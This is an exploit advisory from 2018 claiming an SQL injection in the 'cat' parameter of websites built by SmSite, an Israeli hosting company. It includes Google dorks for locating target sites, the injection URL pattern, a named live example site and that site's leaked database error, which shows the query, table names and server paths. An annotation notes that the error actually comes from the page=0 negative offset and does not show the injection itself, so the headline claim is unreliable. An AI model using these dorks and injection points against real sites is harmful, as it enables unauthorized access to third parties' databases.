#################################################################################################
# Exploit Title : SMSITEנבנה ע״י SmSite.Co.il Hosting Israel SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : smsite.co.il
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''SMSITEנבנה ע״י''
intext:''© כל הזכויות שמורות SMSITE''
# Exploit : /search?page=[ID-NUMBER]&cat=[SQL Injection]
#################################################################################################
# Example Site => executive-israel.co.il/search?page=0&cat=1900' => [ Proof of Concept ] => archive.is/7SCBi
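# SQL Database Error returned for the example request.
# Note: the reported syntax error is at `LIMIT -20, 20`, a negative offset consistent with page=0,
# and the echoed query reads `WHERE 1` with no value taken from `cat`. This output therefore shows
# unvalidated paging input and verbose error disclosure (full query text, table names and server
# file paths); it does not by itself show the quoted `cat` value reaching the SQL statement =>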
LINK ERROR: You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '-20, 20' at line 14
SQL: SELECT `mida_jobs`.`idn`, `mida_jobs`.`name`, `description`, `mida_categories`.
`name` As `cat_name`, `mida_sub_categories`.`name` As `sub_name`, `mida_areas`.`name` As `area_name`
FROM `mida_jobs` LEFT JOIN `mida_categories` ON `mida_jobs`.`category` = `mida_categories`.`idn` LEFT JOIN `mida_sub_categories`
ON `mida_jobs`.`sub_category` = `mida_sub_categories`.`idn` LEFT JOIN `mida_areas` ON `mida_jobs`.`work_area` =
`mida_areas`.`idn` WHERE 1 GROUP BY `mida_jobs`.`idn` ORDER BY `idn` Desc LIMIT -20, 20
Fatal error: Uncaught exception 'Exception' in D:\HostingSpaces\repository\php\db.inc:326 Stack trace: #0
D:\HostingSpaces\repository\php\db.inc(146):
db->failure('SQL ERROR: <br...') #1 D:\HostingSpaces\repository\php\db.inc(186): db->execute('SELECT ?????`mi...') #2
D:\HostingSpaces\repository\php\db.inc(1134): db->query('SELECT ?????`mi...', true, NULL, 1) #3
D:\HostingSpaces\maof1\maof_repository\sections\search\results.inc(130): db->query_object('SELECT ?????`mi...') #4
D:\HostingSpaces\maof1\maof_repository\search.inc(240): require('D:\HostingSpace...') #5
D:\HostingSpaces\maof1\maof_repository\index.inc(33): require('D:\HostingSpace...') #6
D:\HostingSpaces\maof3\executive-israel.co.il\wwwroot\index.php(101): require('D:\HostingSpace...') #7 {main} thrown in
D:\HostingSpaces\repository\php\db.inc on line 326
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################